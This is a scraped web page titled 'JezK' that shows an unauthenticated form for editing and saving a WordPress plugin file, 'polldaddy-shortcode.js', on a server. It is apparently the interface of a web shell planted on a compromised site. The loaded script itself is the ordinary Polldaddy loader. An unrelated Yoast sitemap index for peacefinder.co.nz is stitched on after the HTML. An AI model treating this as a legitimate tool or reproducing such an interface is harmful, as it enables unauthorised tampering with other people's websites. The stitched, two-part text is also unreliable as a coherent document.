
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: polldaddy-shortcode.js</h2><form method="post"><textarea name="file_content" rows="10" cols="50">( function ( w, d ) {
	function parseJSON( str ) {
		try {
			return str ? w.JSON.parse( str ) : null;
		} catch {
			return null;
		}
	}

	w.polldaddyshortcode = {
		render: function () {
			const ratings = d.querySelectorAll( &#039;div.pd-rating[data-settings]&#039; );
			const polls = d.querySelectorAll( &#039;div.PDS_Poll[data-settings]&#039; );

			polls.forEach( pollEl =&gt; {
				if ( pollEl.hasAttribute( &#039;data-pd-init-done&#039; ) ) {
					return;
				}

				pollEl.setAttribute( &#039;data-pd-init-done&#039;, &#039;1&#039; );
				const poll = parseJSON( pollEl.getAttribute( &#039;data-settings&#039; ) );

				if ( poll ) {
					let poll_url;
					try {
						poll_url = new w.URL( poll.url, &#039;https://invalid.tld&#039; );
					} catch {
						return false;
					}
					if ( poll_url.protocol !== &#039;https:&#039; ) {
						return false;
					}
					if (
						poll_url.hostname !== &#039;secure.polldaddy.com&#039; &amp;&amp;
						poll_url.hostname !== &#039;static.polldaddy.com&#039;
					) {
						return false;
					}
					const pathname = poll_url.pathname;
					if ( ! /^\/p\/\d+\.js$/.test( pathname ) ) {
						return false;
					}
					const wp_pd_js = d.createElement( &#039;script&#039; );
					wp_pd_js.src = poll_url.href;
					wp_pd_js.async = true;
					d.head.appendChild( wp_pd_js );
				}
			} );

			ratings.forEach( ratingEl =&gt; {
				if ( ratingEl.hasAttribute( &#039;data-pd-init-done&#039; ) ) {
					return;
				}

				ratingEl.setAttribute( &#039;data-pd-init-done&#039;, &#039;1&#039; );

				const rating = parseJSON( ratingEl.getAttribute( &#039;data-settings&#039; ) );

				if ( ! rating ) {
					return;
				}

				const settings = parseJSON( rating.settings );

				if ( settings === null ) {
					return;
				}

				const key = `${ rating.id }${ rating.item_id }`;
				w[ `PDRTJS_settings_${ key }` ] = settings;

				if (
					typeof w.PDRTJS_RATING !== &#039;undefined&#039; &amp;&amp;
					typeof w[ `PDRTJS_${ key }` ] === &#039;undefined&#039;
				) {
					w[ `PDRTJS_${ key }` ] = new w.PDRTJS_RATING( w[ `PDRTJS_settings_${ key }` ] );
				}
			} );
		},
	};

	d.body.addEventListener( &#039;is.post-load&#039;, () =&gt; w.polldaddyshortcode.render() );

	// In environments where jQuery is present, listen and dispatch with jQuery.
	if ( typeof w.jQuery !== &#039;undefined&#039; ) {
		w.jQuery( d.body ).on( &#039;pd-script-load&#039;, () =&gt; w.polldaddyshortcode.render() );
		w.jQuery( d.body ).trigger( &#039;pd-script-load&#039; );
	} else {
		d.body.addEventListener( &#039;pd-script-load&#039;, () =&gt; w.polldaddyshortcode.render() );
		d.body.dispatchEvent( new Event( &#039;pd-script-load&#039; ) );
	}
} )( window, document );
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//peacefinder.co.nz/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://peacefinder.co.nz/post-sitemap.xml</loc>
		<lastmod>2025-05-09T06:53:29+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/page-sitemap.xml</loc>
		<lastmod>2026-05-02T11:57:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/listings-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/product-sitemap.xml</loc>
		<lastmod>2025-03-22T07:11:30+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/listing_template-sitemap.xml</loc>
		<lastmod>2025-05-08T11:33:26+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/elementor-hf-sitemap.xml</loc>
		<lastmod>2025-03-28T03:15:48+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/category-sitemap.xml</loc>
		<lastmod>2025-05-09T06:50:39+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/condition-sitemap.xml</loc>
		<lastmod>2025-09-25T21:26:17+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/make-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/serie-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/body-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/ca-year-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/mileage-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/transmission-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/engine-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/exterior-color-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/fuel-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/price-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/drive-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/interior-color-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/stm_additional_features-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/author-sitemap.xml</loc>
		<lastmod>2025-05-22T10:05:43+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->